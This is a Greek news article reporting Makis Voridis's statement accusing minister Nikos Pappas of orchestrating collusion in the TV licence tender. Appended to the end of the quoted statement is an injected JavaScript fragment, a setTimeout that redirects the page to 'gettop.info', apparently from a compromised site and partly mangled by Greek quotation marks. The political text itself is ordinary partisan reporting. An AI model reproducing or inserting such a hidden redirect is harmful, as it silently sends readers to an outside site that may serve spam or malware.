Βορίδης για Παππά: Πρόσωπο που συμβολίζει τη διαπλοκή της κυβέρνησης

0
7

 

Μετά το τέλος της συνεδρίασης της Επιτροπής Θεσμών και Διαφάνειας, όπου κατέθετε από το πρωί ο υπουργός Επικρατείας Νίκος Παππάς, ο Μάκης Βορίδης με δήλωσή του καταφέρθηκε εναντίον του ασκώντας σκληρή κριτική ενώ έκανε λόγο για «αυταρχικό και σκοτεινό πρόσωπο μίας υπό κατάρρευση κυβέρνησης».

Ο κ. Βορίδης της ΝΔ τόνισε ότι ο κ. Παππάς συμβολίζει τη διαπλοκή της κυβέρνησης Τσίπρα-Καμμένου, ενώ τον χρακτηρισε ενορχηστρωτή του σκανδάλου σε ό,τι αφορά τον διαγωνισμό με τις τηλεοπτικές άδειες.

Αναλυτικά, η δήλωση του Μάκη Βορίδη:

«Από την σημερινή ακρόαση της επιτροπής θεσμών αποδείχτηκε ότι ο κύριος Παππάς είναι το πρόσωπο που συμβολίζει την διαπλοκή κυβέρνησης Τσίπρα-Καμμένου μιας παραπαίουσας κυβέρνησης.

Επεκτείνει και θεσμοθετεί την διαπλοκή σε όλα τα επίπεδα λίγο πριν το τέλος της. Αποδείχτηκε ότι φοβούνται την διαφάνεια φοβούνται τον κοινοβουλευτικό έλεγχο.

Η απόρριψη του αιτήματος της ΝΔ να παραστούν οι νέοι καναλάρχες και να γίνει διεξοδικός έλεγχος του πόθεν έσχες τους, αίτημα που στηρίχθηκε από όλα τα κόμματα της αντιπολίτευσης, αποδεικνύει το πραγματικό αυταρχικό και σκοτεινό πρόσωπο μιας υπό κατάρρευση κυβέρνησης.

Ο ενορχηστρωτής του πρωτοφανούς αυτού σκανδάλου κύριος Παππάς δεν κατάφερε να απαντήσει πειστικά ούτε σε ένα ερώτημα. Αποκαλύφθηκε ότι είναι ο άνθρωπος που κρύβεται πίσω από την διαβλητή επιτροπή. Δεν απάντησε στις πολύ σοβαρές καταγγελίες ότι έστελνε απεσταλμένο σε καναλάρχες για να ελέγξει τα μέσα ενημέρωσης. Με ψέματα και υπεκφυγές προσπάθησε να κρύψει τις βαρύτατες προσωπικές ευθύνες του.

Η κοινωνία έχει αντιληφθεί το πρωτοφανές στήσιμο της νέας διαπλοκής που υπηρετεί τις ορέξεις της παρέας του κύριου Τσίπρα ο όποιος εκφυλίζει κάθε μέρα και περισσότερο τους θεσμούς και τις λειτουργίες του κράτους.

Οι μάσκες όμως έπεσαν». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here